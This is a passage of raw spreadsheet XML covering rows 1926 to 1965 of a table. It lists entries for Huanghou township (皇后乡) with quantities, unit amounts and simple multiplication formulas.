      </c>
      <c r="I1926" s="14">
        <f>H1926*G1926</f>
        <v>600</v>
      </c>
      <c r="J1926" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1926" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1927" ht="23" customHeight="1" spans="1:11">
      <c r="A1927" s="13" t="s">
        <v>5136</v>
      </c>
      <c r="B1927" s="14" t="str">
        <f>B1926</f>
        <v>皇后乡</v>
      </c>
      <c r="C1927" s="14" t="str">
        <f>C1926</f>
        <v>皇后乡</v>
      </c>
      <c r="D1927" s="13" t="s">
        <v>5137</v>
      </c>
      <c r="E1927" s="13" t="s">
        <v>5031</v>
      </c>
      <c r="F1927" s="14" t="str">
        <f>F1926</f>
        <v>4113210615</v>
      </c>
      <c r="G1927" s="14"/>
      <c r="H1927" s="14"/>
      <c r="I1927" s="14"/>
      <c r="J1927" s="14"/>
      <c r="K1927" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1928" ht="23" customHeight="1" spans="1:11">
      <c r="A1928" s="13" t="s">
        <v>5138</v>
      </c>
      <c r="B1928" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1928" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1928" s="14" t="s">
        <v>5139</v>
      </c>
      <c r="E1928" s="14" t="s">
        <v>4893</v>
      </c>
      <c r="F1928" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1928" s="14">
        <v>1</v>
      </c>
      <c r="H1928" s="14">
        <v>340</v>
      </c>
      <c r="I1928" s="14">
        <f>H1928*G1928</f>
        <v>340</v>
      </c>
      <c r="J1928" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1928" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1929" ht="23" customHeight="1" spans="1:11">
      <c r="A1929" s="13" t="s">
        <v>5140</v>
      </c>
      <c r="B1929" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1929" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1929" s="14" t="s">
        <v>5041</v>
      </c>
      <c r="E1929" s="14" t="s">
        <v>4914</v>
      </c>
      <c r="F1929" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1929" s="14">
        <v>1</v>
      </c>
      <c r="H1929" s="14">
        <v>340</v>
      </c>
      <c r="I1929" s="14">
        <f>H1929*G1929</f>
        <v>340</v>
      </c>
      <c r="J1929" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1929" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1930" ht="23" customHeight="1" spans="1:11">
      <c r="A1930" s="13" t="s">
        <v>5141</v>
      </c>
      <c r="B1930" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1930" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1930" s="14" t="s">
        <v>5142</v>
      </c>
      <c r="E1930" s="14" t="s">
        <v>5143</v>
      </c>
      <c r="F1930" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1930" s="14">
        <v>1</v>
      </c>
      <c r="H1930" s="14">
        <v>340</v>
      </c>
      <c r="I1930" s="14">
        <f>H1930*G1930</f>
        <v>340</v>
      </c>
      <c r="J1930" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1930" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1931" ht="23" customHeight="1" spans="1:11">
      <c r="A1931" s="13" t="s">
        <v>5144</v>
      </c>
      <c r="B1931" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1931" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1931" s="14" t="s">
        <v>5145</v>
      </c>
      <c r="E1931" s="14" t="s">
        <v>5146</v>
      </c>
      <c r="F1931" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1931" s="14">
        <v>2</v>
      </c>
      <c r="H1931" s="14">
        <v>300</v>
      </c>
      <c r="I1931" s="14">
        <f>H1931*G1931</f>
        <v>600</v>
      </c>
      <c r="J1931" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1931" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1932" ht="23" customHeight="1" spans="1:11">
      <c r="A1932" s="13" t="s">
        <v>5147</v>
      </c>
      <c r="B1932" s="14" t="str">
        <f>B1931</f>
        <v>皇后乡</v>
      </c>
      <c r="C1932" s="14" t="str">
        <f>C1931</f>
        <v>皇后乡</v>
      </c>
      <c r="D1932" s="13" t="s">
        <v>5148</v>
      </c>
      <c r="E1932" s="13" t="s">
        <v>2243</v>
      </c>
      <c r="F1932" s="14" t="str">
        <f>F1931</f>
        <v>4113210615</v>
      </c>
      <c r="G1932" s="14"/>
      <c r="H1932" s="14"/>
      <c r="I1932" s="14"/>
      <c r="J1932" s="14"/>
      <c r="K1932" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1933" ht="23" customHeight="1" spans="1:11">
      <c r="A1933" s="13" t="s">
        <v>5149</v>
      </c>
      <c r="B1933" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1933" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1933" s="14" t="s">
        <v>5150</v>
      </c>
      <c r="E1933" s="14" t="s">
        <v>5151</v>
      </c>
      <c r="F1933" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1933" s="14">
        <v>2</v>
      </c>
      <c r="H1933" s="14">
        <v>300</v>
      </c>
      <c r="I1933" s="14">
        <f>H1933*G1933</f>
        <v>600</v>
      </c>
      <c r="J1933" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1933" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1934" ht="23" customHeight="1" spans="1:11">
      <c r="A1934" s="13" t="s">
        <v>5152</v>
      </c>
      <c r="B1934" s="14" t="str">
        <f>B1933</f>
        <v>皇后乡</v>
      </c>
      <c r="C1934" s="14" t="str">
        <f>C1933</f>
        <v>皇后乡</v>
      </c>
      <c r="D1934" s="13" t="s">
        <v>5153</v>
      </c>
      <c r="E1934" s="13" t="s">
        <v>5154</v>
      </c>
      <c r="F1934" s="14" t="str">
        <f>F1933</f>
        <v>4113210615</v>
      </c>
      <c r="G1934" s="14"/>
      <c r="H1934" s="14"/>
      <c r="I1934" s="14"/>
      <c r="J1934" s="14"/>
      <c r="K1934" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1935" ht="23" customHeight="1" spans="1:11">
      <c r="A1935" s="13" t="s">
        <v>5155</v>
      </c>
      <c r="B1935" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1935" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1935" s="14" t="s">
        <v>5156</v>
      </c>
      <c r="E1935" s="14" t="s">
        <v>5157</v>
      </c>
      <c r="F1935" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1935" s="14">
        <v>2</v>
      </c>
      <c r="H1935" s="14">
        <v>300</v>
      </c>
      <c r="I1935" s="14">
        <f>H1935*G1935</f>
        <v>600</v>
      </c>
      <c r="J1935" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1935" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1936" ht="23" customHeight="1" spans="1:11">
      <c r="A1936" s="13" t="s">
        <v>5158</v>
      </c>
      <c r="B1936" s="14" t="str">
        <f>B1935</f>
        <v>皇后乡</v>
      </c>
      <c r="C1936" s="14" t="str">
        <f>C1935</f>
        <v>皇后乡</v>
      </c>
      <c r="D1936" s="13" t="s">
        <v>5159</v>
      </c>
      <c r="E1936" s="13" t="s">
        <v>5160</v>
      </c>
      <c r="F1936" s="14" t="str">
        <f>F1935</f>
        <v>4113210615</v>
      </c>
      <c r="G1936" s="14"/>
      <c r="H1936" s="14"/>
      <c r="I1936" s="14"/>
      <c r="J1936" s="14"/>
      <c r="K1936" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1937" ht="23" customHeight="1" spans="1:11">
      <c r="A1937" s="13" t="s">
        <v>5161</v>
      </c>
      <c r="B1937" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1937" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1937" s="14" t="s">
        <v>5162</v>
      </c>
      <c r="E1937" s="14" t="s">
        <v>5163</v>
      </c>
      <c r="F1937" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1937" s="14">
        <v>2</v>
      </c>
      <c r="H1937" s="14">
        <v>300</v>
      </c>
      <c r="I1937" s="14">
        <f>H1937*G1937</f>
        <v>600</v>
      </c>
      <c r="J1937" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1937" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1938" ht="23" customHeight="1" spans="1:11">
      <c r="A1938" s="13" t="s">
        <v>5164</v>
      </c>
      <c r="B1938" s="14" t="str">
        <f>B1937</f>
        <v>皇后乡</v>
      </c>
      <c r="C1938" s="14" t="str">
        <f>C1937</f>
        <v>皇后乡</v>
      </c>
      <c r="D1938" s="13" t="s">
        <v>5165</v>
      </c>
      <c r="E1938" s="13" t="s">
        <v>5056</v>
      </c>
      <c r="F1938" s="14" t="str">
        <f>F1937</f>
        <v>4113210615</v>
      </c>
      <c r="G1938" s="14"/>
      <c r="H1938" s="14"/>
      <c r="I1938" s="14"/>
      <c r="J1938" s="14"/>
      <c r="K1938" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1939" ht="23" customHeight="1" spans="1:11">
      <c r="A1939" s="13" t="s">
        <v>5166</v>
      </c>
      <c r="B1939" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1939" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1939" s="14" t="s">
        <v>5167</v>
      </c>
      <c r="E1939" s="14" t="s">
        <v>4981</v>
      </c>
      <c r="F1939" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1939" s="14">
        <v>2</v>
      </c>
      <c r="H1939" s="14">
        <v>300</v>
      </c>
      <c r="I1939" s="14">
        <f>H1939*G1939</f>
        <v>600</v>
      </c>
      <c r="J1939" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1939" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1940" ht="23" customHeight="1" spans="1:11">
      <c r="A1940" s="13" t="s">
        <v>5168</v>
      </c>
      <c r="B1940" s="14" t="str">
        <f>B1939</f>
        <v>皇后乡</v>
      </c>
      <c r="C1940" s="14" t="str">
        <f>C1939</f>
        <v>皇后乡</v>
      </c>
      <c r="D1940" s="13" t="s">
        <v>5169</v>
      </c>
      <c r="E1940" s="13" t="s">
        <v>5170</v>
      </c>
      <c r="F1940" s="14" t="str">
        <f>F1939</f>
        <v>4113210615</v>
      </c>
      <c r="G1940" s="14"/>
      <c r="H1940" s="14"/>
      <c r="I1940" s="14"/>
      <c r="J1940" s="14"/>
      <c r="K1940" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1941" ht="23" customHeight="1" spans="1:11">
      <c r="A1941" s="13" t="s">
        <v>5171</v>
      </c>
      <c r="B1941" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1941" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1941" s="14" t="s">
        <v>5172</v>
      </c>
      <c r="E1941" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F1941" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1941" s="14">
        <v>2</v>
      </c>
      <c r="H1941" s="14">
        <v>300</v>
      </c>
      <c r="I1941" s="14">
        <f>H1941*G1941</f>
        <v>600</v>
      </c>
      <c r="J1941" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1941" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1942" ht="23" customHeight="1" spans="1:11">
      <c r="A1942" s="13" t="s">
        <v>5173</v>
      </c>
      <c r="B1942" s="14" t="str">
        <f>B1941</f>
        <v>皇后乡</v>
      </c>
      <c r="C1942" s="14" t="str">
        <f>C1941</f>
        <v>皇后乡</v>
      </c>
      <c r="D1942" s="13" t="s">
        <v>5174</v>
      </c>
      <c r="E1942" s="13" t="s">
        <v>5061</v>
      </c>
      <c r="F1942" s="14" t="str">
        <f>F1941</f>
        <v>4113210615</v>
      </c>
      <c r="G1942" s="14"/>
      <c r="H1942" s="14"/>
      <c r="I1942" s="14"/>
      <c r="J1942" s="14"/>
      <c r="K1942" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1943" ht="23" customHeight="1" spans="1:11">
      <c r="A1943" s="13" t="s">
        <v>5175</v>
      </c>
      <c r="B1943" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1943" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1943" s="14" t="s">
        <v>5176</v>
      </c>
      <c r="E1943" s="14" t="s">
        <v>5177</v>
      </c>
      <c r="F1943" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1943" s="14">
        <v>2</v>
      </c>
      <c r="H1943" s="14">
        <v>300</v>
      </c>
      <c r="I1943" s="14">
        <f>H1943*G1943</f>
        <v>600</v>
      </c>
      <c r="J1943" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1943" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1944" ht="23" customHeight="1" spans="1:11">
      <c r="A1944" s="13" t="s">
        <v>5178</v>
      </c>
      <c r="B1944" s="14" t="str">
        <f>B1943</f>
        <v>皇后乡</v>
      </c>
      <c r="C1944" s="14" t="str">
        <f>C1943</f>
        <v>皇后乡</v>
      </c>
      <c r="D1944" s="13" t="s">
        <v>5179</v>
      </c>
      <c r="E1944" s="13" t="s">
        <v>5180</v>
      </c>
      <c r="F1944" s="14" t="str">
        <f>F1943</f>
        <v>4113210615</v>
      </c>
      <c r="G1944" s="14"/>
      <c r="H1944" s="14"/>
      <c r="I1944" s="14"/>
      <c r="J1944" s="14"/>
      <c r="K1944" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1945" ht="23" customHeight="1" spans="1:11">
      <c r="A1945" s="13" t="s">
        <v>5181</v>
      </c>
      <c r="B1945" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1945" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1945" s="14" t="s">
        <v>5182</v>
      </c>
      <c r="E1945" s="14" t="s">
        <v>4922</v>
      </c>
      <c r="F1945" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1945" s="14">
        <v>2</v>
      </c>
      <c r="H1945" s="14">
        <v>300</v>
      </c>
      <c r="I1945" s="14">
        <f>H1945*G1945</f>
        <v>600</v>
      </c>
      <c r="J1945" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1945" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1946" ht="23" customHeight="1" spans="1:11">
      <c r="A1946" s="13" t="s">
        <v>5183</v>
      </c>
      <c r="B1946" s="14" t="str">
        <f>B1945</f>
        <v>皇后乡</v>
      </c>
      <c r="C1946" s="14" t="str">
        <f>C1945</f>
        <v>皇后乡</v>
      </c>
      <c r="D1946" s="13" t="s">
        <v>5184</v>
      </c>
      <c r="E1946" s="13" t="s">
        <v>3975</v>
      </c>
      <c r="F1946" s="14" t="str">
        <f>F1945</f>
        <v>4113210615</v>
      </c>
      <c r="G1946" s="14"/>
      <c r="H1946" s="14"/>
      <c r="I1946" s="14"/>
      <c r="J1946" s="14"/>
      <c r="K1946" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1947" ht="23" customHeight="1" spans="1:11">
      <c r="A1947" s="13" t="s">
        <v>5185</v>
      </c>
      <c r="B1947" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1947" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1947" s="14" t="s">
        <v>5186</v>
      </c>
      <c r="E1947" s="14" t="s">
        <v>5187</v>
      </c>
      <c r="F1947" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1947" s="14">
        <v>2</v>
      </c>
      <c r="H1947" s="14">
        <v>300</v>
      </c>
      <c r="I1947" s="14">
        <f>H1947*G1947</f>
        <v>600</v>
      </c>
      <c r="J1947" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1947" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1948" ht="23" customHeight="1" spans="1:11">
      <c r="A1948" s="13" t="s">
        <v>5188</v>
      </c>
      <c r="B1948" s="14" t="str">
        <f>B1947</f>
        <v>皇后乡</v>
      </c>
      <c r="C1948" s="14" t="str">
        <f>C1947</f>
        <v>皇后乡</v>
      </c>
      <c r="D1948" s="13" t="s">
        <v>5189</v>
      </c>
      <c r="E1948" s="13" t="s">
        <v>5071</v>
      </c>
      <c r="F1948" s="14" t="str">
        <f>F1947</f>
        <v>4113210615</v>
      </c>
      <c r="G1948" s="14"/>
      <c r="H1948" s="14"/>
      <c r="I1948" s="14"/>
      <c r="J1948" s="14"/>
      <c r="K1948" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1949" ht="23" customHeight="1" spans="1:11">
      <c r="A1949" s="13" t="s">
        <v>5190</v>
      </c>
      <c r="B1949" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1949" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1949" s="14" t="s">
        <v>5191</v>
      </c>
      <c r="E1949" s="14" t="s">
        <v>5009</v>
      </c>
      <c r="F1949" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1949" s="14">
        <v>2</v>
      </c>
      <c r="H1949" s="14">
        <v>300</v>
      </c>
      <c r="I1949" s="14">
        <f>H1949*G1949</f>
        <v>600</v>
      </c>
      <c r="J1949" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1949" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1950" ht="23" customHeight="1" spans="1:11">
      <c r="A1950" s="13" t="s">
        <v>5192</v>
      </c>
      <c r="B1950" s="14" t="str">
        <f>B1949</f>
        <v>皇后乡</v>
      </c>
      <c r="C1950" s="14" t="str">
        <f>C1949</f>
        <v>皇后乡</v>
      </c>
      <c r="D1950" s="13" t="s">
        <v>5193</v>
      </c>
      <c r="E1950" s="13" t="s">
        <v>5154</v>
      </c>
      <c r="F1950" s="14" t="str">
        <f>F1949</f>
        <v>4113210615</v>
      </c>
      <c r="G1950" s="14"/>
      <c r="H1950" s="14"/>
      <c r="I1950" s="14"/>
      <c r="J1950" s="14"/>
      <c r="K1950" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1951" ht="23" customHeight="1" spans="1:11">
      <c r="A1951" s="13" t="s">
        <v>5194</v>
      </c>
      <c r="B1951" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1951" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1951" s="14" t="s">
        <v>5195</v>
      </c>
      <c r="E1951" s="14" t="s">
        <v>5187</v>
      </c>
      <c r="F1951" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1951" s="14">
        <v>2</v>
      </c>
      <c r="H1951" s="14">
        <v>300</v>
      </c>
      <c r="I1951" s="14">
        <f>H1951*G1951</f>
        <v>600</v>
      </c>
      <c r="J1951" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1951" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1952" ht="23" customHeight="1" spans="1:11">
      <c r="A1952" s="13" t="s">
        <v>5196</v>
      </c>
      <c r="B1952" s="14" t="str">
        <f>B1951</f>
        <v>皇后乡</v>
      </c>
      <c r="C1952" s="14" t="str">
        <f>C1951</f>
        <v>皇后乡</v>
      </c>
      <c r="D1952" s="13" t="s">
        <v>5197</v>
      </c>
      <c r="E1952" s="13" t="s">
        <v>3776</v>
      </c>
      <c r="F1952" s="14" t="str">
        <f>F1951</f>
        <v>4113210615</v>
      </c>
      <c r="G1952" s="14"/>
      <c r="H1952" s="14"/>
      <c r="I1952" s="14"/>
      <c r="J1952" s="14"/>
      <c r="K1952" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1953" ht="23" customHeight="1" spans="1:11">
      <c r="A1953" s="13" t="s">
        <v>5198</v>
      </c>
      <c r="B1953" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1953" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1953" s="14" t="s">
        <v>5199</v>
      </c>
      <c r="E1953" s="14" t="s">
        <v>5187</v>
      </c>
      <c r="F1953" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1953" s="14">
        <v>2</v>
      </c>
      <c r="H1953" s="14">
        <v>300</v>
      </c>
      <c r="I1953" s="14">
        <f>H1953*G1953</f>
        <v>600</v>
      </c>
      <c r="J1953" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1953" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1954" ht="23" customHeight="1" spans="1:11">
      <c r="A1954" s="13" t="s">
        <v>5200</v>
      </c>
      <c r="B1954" s="14" t="str">
        <f>B1953</f>
        <v>皇后乡</v>
      </c>
      <c r="C1954" s="14" t="str">
        <f>C1953</f>
        <v>皇后乡</v>
      </c>
      <c r="D1954" s="13" t="s">
        <v>5201</v>
      </c>
      <c r="E1954" s="13" t="s">
        <v>5202</v>
      </c>
      <c r="F1954" s="14" t="str">
        <f>F1953</f>
        <v>4113210615</v>
      </c>
      <c r="G1954" s="14"/>
      <c r="H1954" s="14"/>
      <c r="I1954" s="14"/>
      <c r="J1954" s="14"/>
      <c r="K1954" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1955" ht="23" customHeight="1" spans="1:11">
      <c r="A1955" s="13" t="s">
        <v>5203</v>
      </c>
      <c r="B1955" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1955" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1955" s="14" t="s">
        <v>5204</v>
      </c>
      <c r="E1955" s="14" t="s">
        <v>5087</v>
      </c>
      <c r="F1955" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1955" s="14">
        <v>2</v>
      </c>
      <c r="H1955" s="14">
        <v>300</v>
      </c>
      <c r="I1955" s="14">
        <f>H1955*G1955</f>
        <v>600</v>
      </c>
      <c r="J1955" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1955" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1956" ht="23" customHeight="1" spans="1:11">
      <c r="A1956" s="13" t="s">
        <v>5205</v>
      </c>
      <c r="B1956" s="14" t="str">
        <f>B1955</f>
        <v>皇后乡</v>
      </c>
      <c r="C1956" s="14" t="str">
        <f>C1955</f>
        <v>皇后乡</v>
      </c>
      <c r="D1956" s="13" t="s">
        <v>5206</v>
      </c>
      <c r="E1956" s="13" t="s">
        <v>5031</v>
      </c>
      <c r="F1956" s="14" t="str">
        <f>F1955</f>
        <v>4113210615</v>
      </c>
      <c r="G1956" s="14"/>
      <c r="H1956" s="14"/>
      <c r="I1956" s="14"/>
      <c r="J1956" s="14"/>
      <c r="K1956" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1957" ht="23" customHeight="1" spans="1:11">
      <c r="A1957" s="13" t="s">
        <v>5207</v>
      </c>
      <c r="B1957" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1957" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1957" s="14" t="s">
        <v>5208</v>
      </c>
      <c r="E1957" s="14" t="s">
        <v>4948</v>
      </c>
      <c r="F1957" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1957" s="14">
        <v>3</v>
      </c>
      <c r="H1957" s="14">
        <v>265</v>
      </c>
      <c r="I1957" s="14">
        <f>H1957*G1957</f>
        <v>795</v>
      </c>
      <c r="J1957" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1957" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1958" ht="23" customHeight="1" spans="1:11">
      <c r="A1958" s="13" t="s">
        <v>5209</v>
      </c>
      <c r="B1958" s="14" t="str">
        <f>B1957</f>
        <v>皇后乡</v>
      </c>
      <c r="C1958" s="14" t="str">
        <f>C1957</f>
        <v>皇后乡</v>
      </c>
      <c r="D1958" s="13" t="s">
        <v>5210</v>
      </c>
      <c r="E1958" s="13" t="s">
        <v>4916</v>
      </c>
      <c r="F1958" s="14" t="str">
        <f>F1957</f>
        <v>4113210615</v>
      </c>
      <c r="G1958" s="14"/>
      <c r="H1958" s="14"/>
      <c r="I1958" s="14"/>
      <c r="J1958" s="14"/>
      <c r="K1958" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1959" ht="23" customHeight="1" spans="1:11">
      <c r="A1959" s="13" t="s">
        <v>5211</v>
      </c>
      <c r="B1959" s="14" t="str">
        <f>B1958</f>
        <v>皇后乡</v>
      </c>
      <c r="C1959" s="14" t="str">
        <f>C1958</f>
        <v>皇后乡</v>
      </c>
      <c r="D1959" s="20" t="s">
        <v>5212</v>
      </c>
      <c r="E1959" s="20" t="s">
        <v>5213</v>
      </c>
      <c r="F1959" s="14" t="str">
        <f>F1958</f>
        <v>4113210615</v>
      </c>
      <c r="G1959" s="14"/>
      <c r="H1959" s="14"/>
      <c r="I1959" s="14"/>
      <c r="J1959" s="14"/>
      <c r="K1959" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1960" ht="23" customHeight="1" spans="1:11">
      <c r="A1960" s="13" t="s">
        <v>5214</v>
      </c>
      <c r="B1960" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1960" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1960" s="14" t="s">
        <v>5215</v>
      </c>
      <c r="E1960" s="14" t="s">
        <v>5216</v>
      </c>
      <c r="F1960" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1960" s="14">
        <v>2</v>
      </c>
      <c r="H1960" s="14">
        <v>300</v>
      </c>
      <c r="I1960" s="14">
        <f>H1960*G1960</f>
        <v>600</v>
      </c>
      <c r="J1960" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1960" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1961" ht="23" customHeight="1" spans="1:11">
      <c r="A1961" s="13" t="s">
        <v>5217</v>
      </c>
      <c r="B1961" s="14" t="str">
        <f>B1960</f>
        <v>皇后乡</v>
      </c>
      <c r="C1961" s="14" t="str">
        <f>C1960</f>
        <v>皇后乡</v>
      </c>
      <c r="D1961" s="13" t="s">
        <v>5218</v>
      </c>
      <c r="E1961" s="13" t="s">
        <v>5219</v>
      </c>
      <c r="F1961" s="14" t="str">
        <f>F1960</f>
        <v>4113210615</v>
      </c>
      <c r="G1961" s="14"/>
      <c r="H1961" s="14"/>
      <c r="I1961" s="14"/>
      <c r="J1961" s="14"/>
      <c r="K1961" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1962" ht="23" customHeight="1" spans="1:11">
      <c r="A1962" s="13" t="s">
        <v>5220</v>
      </c>
      <c r="B1962" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1962" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1962" s="14" t="s">
        <v>5221</v>
      </c>
      <c r="E1962" s="14" t="s">
        <v>5034</v>
      </c>
      <c r="F1962" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1962" s="14">
        <v>3</v>
      </c>
      <c r="H1962" s="14">
        <v>265</v>
      </c>
      <c r="I1962" s="14">
        <f>H1962*G1962</f>
        <v>795</v>
      </c>
      <c r="J1962" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1962" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1963" ht="23" customHeight="1" spans="1:11">
      <c r="A1963" s="13" t="s">
        <v>5222</v>
      </c>
      <c r="B1963" s="14" t="str">
        <f>B1962</f>
        <v>皇后乡</v>
      </c>
      <c r="C1963" s="14" t="str">
        <f>C1962</f>
        <v>皇后乡</v>
      </c>
      <c r="D1963" s="13" t="s">
        <v>5223</v>
      </c>
      <c r="E1963" s="68" t="s">
        <v>5119</v>
      </c>
      <c r="F1963" s="14" t="str">
        <f>F1962</f>
        <v>4113210615</v>
      </c>
      <c r="G1963" s="14"/>
      <c r="H1963" s="14"/>
      <c r="I1963" s="14"/>
      <c r="J1963" s="14"/>
      <c r="K1963" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1964" ht="23" customHeight="1" spans="1:11">
      <c r="A1964" s="13" t="s">
        <v>5224</v>
      </c>
      <c r="B1964" s="14" t="str">
        <f>B1963</f>
        <v>皇后乡</v>
      </c>
      <c r="C1964" s="14" t="str">
        <f>C1963</f>
        <v>皇后乡</v>
      </c>
      <c r="D1964" s="19" t="s">
        <v>5225</v>
      </c>
      <c r="E1964" s="19" t="s">
        <v>5226</v>
      </c>
      <c r="F1964" s="14" t="str">
        <f>F1963</f>
        <v>4113210615</v>
      </c>
      <c r="G1964" s="14"/>
      <c r="H1964" s="14"/>
      <c r="I1964" s="14"/>
      <c r="J1964" s="14"/>
      <c r="K1964" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1965" ht="23" customHeight="1" spans="1:11">
      <c r="A1965" s="13" t="s">
        <v>5227</v>
      </c>
      <c r="B1965" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1965" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1965" s="14" t="s">
        <v>5228</v>
      </c>
      <c r="E1965" s="14" t="s">
        <v>5229</v>
      </c>
      <c r="F1965" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1965" s="14">
        <v>2</v>
      </c>
      <c r="H1965" s="14">
        <v>300</v>
      </c>
      <c r="I1965" s="14">
        <f>H1965*G1965</f>
        <v>600</v>
      </c>
      <c r="J1965" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1965" s="14" t="s">
        <v>225</v>
      </c>
    </row>
